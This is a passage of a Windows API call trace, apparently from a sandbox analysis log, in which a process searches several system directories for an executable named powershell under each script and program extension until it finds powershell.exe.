	[0741.190] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.191] SetErrorMode (uMode=0x1) returned 0x1
	[0741.191] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.191] SetErrorMode (uMode=0x1) returned 0x1
	[0741.191] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.191] SetErrorMode (uMode=0x1) returned 0x1
	[0741.192] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.192] SetErrorMode (uMode=0x1) returned 0x1
	[0741.192] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.192] SetErrorMode (uMode=0x1) returned 0x1
	[0741.192] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.192] SetErrorMode (uMode=0x1) returned 0x1
	[0741.193] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.193] SetErrorMode (uMode=0x1) returned 0x1
	[0741.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.193] SetErrorMode (uMode=0x1) returned 0x1
	[0741.193] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.194] SetErrorMode (uMode=0x1) returned 0x1
	[0741.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.194] SetErrorMode (uMode=0x1) returned 0x1
	[0741.194] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.194] SetErrorMode (uMode=0x1) returned 0x1
	[0741.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.195] SetErrorMode (uMode=0x1) returned 0x1
	[0741.195] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.195] SetErrorMode (uMode=0x1) returned 0x1
	[0741.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.195] SetErrorMode (uMode=0x1) returned 0x1
	[0741.196] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.196] SetErrorMode (uMode=0x1) returned 0x1
	[0741.196] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.196] SetErrorMode (uMode=0x1) returned 0x1
	[0741.196] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.197] SetErrorMode (uMode=0x1) returned 0x1
	[0741.197] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0741.197] SetErrorMode (uMode=0x1) returned 0x1
	[0741.197] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.197] SetErrorMode (uMode=0x1) returned 0x1
	[0741.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.198] SetErrorMode (uMode=0x1) returned 0x1
	[0741.198] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.198] SetErrorMode (uMode=0x1) returned 0x1
	[0741.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.198] SetErrorMode (uMode=0x1) returned 0x1
	[0741.198] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.199] SetErrorMode (uMode=0x1) returned 0x1
	[0741.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.199] SetErrorMode (uMode=0x1) returned 0x1
	[0741.199] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.199] SetErrorMode (uMode=0x1) returned 0x1
	[0741.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.200] SetErrorMode (uMode=0x1) returned 0x1
	[0741.200] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.200] SetErrorMode (uMode=0x1) returned 0x1
	[0741.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.200] SetErrorMode (uMode=0x1) returned 0x1
	[0741.200] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.201] SetErrorMode (uMode=0x1) returned 0x1
	[0741.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.201] SetErrorMode (uMode=0x1) returned 0x1
	[0741.201] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.201] SetErrorMode (uMode=0x1) returned 0x1
	[0741.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.202] SetErrorMode (uMode=0x1) returned 0x1
	[0741.202] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.202] SetErrorMode (uMode=0x1) returned 0x1
	[0741.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.202] SetErrorMode (uMode=0x1) returned 0x1
	[0741.203] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.203] SetErrorMode (uMode=0x1) returned 0x1
	[0741.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.203] SetErrorMode (uMode=0x1) returned 0x1
	[0741.203] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.204] SetErrorMode (uMode=0x1) returned 0x1
	[0741.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.204] SetErrorMode (uMode=0x1) returned 0x1
	[0741.204] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.204] SetErrorMode (uMode=0x1) returned 0x1
	[0741.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.205] SetErrorMode (uMode=0x1) returned 0x1
	[0741.205] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.205] SetErrorMode (uMode=0x1) returned 0x1
	[0741.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.205] SetErrorMode (uMode=0x1) returned 0x1
	[0741.205] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.206] SetErrorMode (uMode=0x1) returned 0x1
	[0741.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.206] SetErrorMode (uMode=0x1) returned 0x1
	[0741.206] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.206] SetErrorMode (uMode=0x1) returned 0x1
	[0741.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.207] SetErrorMode (uMode=0x1) returned 0x1
	[0741.207] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.207] SetErrorMode (uMode=0x1) returned 0x1
	[0741.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0741.207] SetErrorMode (uMode=0x1) returned 0x1
	[0741.207] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.208] SetErrorMode (uMode=0x1) returned 0x1
	[0741.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0741.208] SetErrorMode (uMode=0x1) returned 0x1
	[0741.208] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.208] SetErrorMode (uMode=0x1) returned 0x1
	[0741.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0741.209] SetErrorMode (uMode=0x1) returned 0x1
	[0741.209] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.209] SetErrorMode (uMode=0x1) returned 0x1
	[0741.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0741.209] SetErrorMode (uMode=0x1) returned 0x1
	[0741.210] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.210] SetErrorMode (uMode=0x1) returned 0x1
	[0741.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0741.210] SetErrorMode (uMode=0x1) returned 0x1
	[0741.210] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.210] SetErrorMode (uMode=0x1) returned 0x1
	[0741.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0741.211] SetErrorMode (uMode=0x1) returned 0x1
	[0741.211] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b310350
